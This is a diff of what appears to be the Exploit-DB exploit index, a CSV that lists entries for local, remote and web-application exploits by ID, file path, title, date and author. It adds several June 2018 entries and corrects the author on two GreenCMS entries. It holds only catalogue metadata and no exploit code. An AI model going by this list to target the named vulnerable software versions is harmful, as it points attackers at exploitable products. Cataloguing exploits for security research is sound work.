 44549,exploits/windows/local/44549.py,"Allok AVI to DVD SVCD VCD Converter 4.0.1217 - Buffer Overflow (SEH)",2018-04-26,T3jv1l,local,windows,
@ -9755,6 +9755,8 @@ id,file,description,date,author,type,platform,port
 44818,exploits/hardware/local/44818.md,"Sony Playstation 4 (PS4) 5.07 - 'Jailbreak' WebKit / 'bpf v2' Kernel Loader",2018-05-28,Specter,local,hardware,
 44819,exploits/hardware/local/44819.js,"Sony Playstation 4 (PS4) 5.1 - Kernel (PoC)",2018-05-28,qwertyoruiop,local,hardware,
 44820,exploits/hardware/local/44820.txt,"Sony Playstation 3 (PS3) 4.82 - 'Jailbreak' (ROP)",2018-01-28,PS3Xploit,local,hardware,
+44828,exploits/windows/local/44828.py,"Zip-n-Go 4.9 - Buffer Overflow (SEH)",2018-06-04,"Hashim Jawad",local,windows,
+44830,exploits/windows/local/44830.rb,"Windows - UAC Protection Bypass (Via Slui File Handler Hijack) (Metasploit)",2018-06-04,Metasploit,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -16540,6 +16542,7 @@ id,file,description,date,author,type,platform,port
 44779,exploits/hardware/remote/44779.txt,"Bitmain Antminer D3/L3+/S9 - Remote Command Execution",2018-05-27,CorryL,remote,hardware,
 44784,exploits/windows_x86-64/remote/44784.py,"CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass)",2018-05-28,"Juan Prescotto",remote,windows_x86-64,
 44822,exploits/linux/remote/44822.txt,"Git < 2.17.1 - Remote Code Execution",2018-06-01,JameelNabbo,remote,linux,
+44829,exploits/linux/remote/44829.py,"CyberArk < 10 - Memory Disclosure",2018-06-04,"Thomas Zuk",remote,linux,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -39489,5 +39492,7 @@ id,file,description,date,author,type,platform,port
 44816,exploits/php/webapps/44816.txt,"Grid Pro Big Data 1.0 - SQL Injection",2018-05-31,"Kağan Çapar",webapps,php,
 44823,exploits/php/webapps/44823.txt,"Smartshop 1 - 'id' SQL Injection",2018-06-03,L0RD,webapps,php,
 44824,exploits/php/webapps/44824.html,"Smartshop 1 - Cross-Site Request Forgery",2018-06-03,L0RD,webapps,php,
-44825,exploits/php/webapps/44825.html,"GreenCMS 2.3.0603 - Cross-Site Request Forgery / Remote Code Execution",2018-06-03,longer,webapps,php,
-44826,exploits/php/webapps/44826.html,"GreenCMS 2.3.0603 - Cross-Site Request Forgery (Add Admin)",2018-06-03,longer,webapps,php,
+44825,exploits/php/webapps/44825.html,"GreenCMS 2.3.0603 - Cross-Site Request Forgery / Remote Code Execution",2018-06-03,xichao,webapps,php,
+44826,exploits/php/webapps/44826.html,"GreenCMS 2.3.0603 - Cross-Site Request Forgery (Add Admin)",2018-06-03,xichao,webapps,php,
+44827,exploits/java/webapps/44827.txt,"SearchBlox 8.6.7 - XML External Entity Injection",2018-06-04,"Ahmet Gurel",webapps,java,
+44831,exploits/aspx/webapps/44831.txt,"EMS Master Calendar < 8.0.0.20180520 - Reflected Cross-Site Scripting",2018-06-04,"Chris Barretto",webapps,aspx,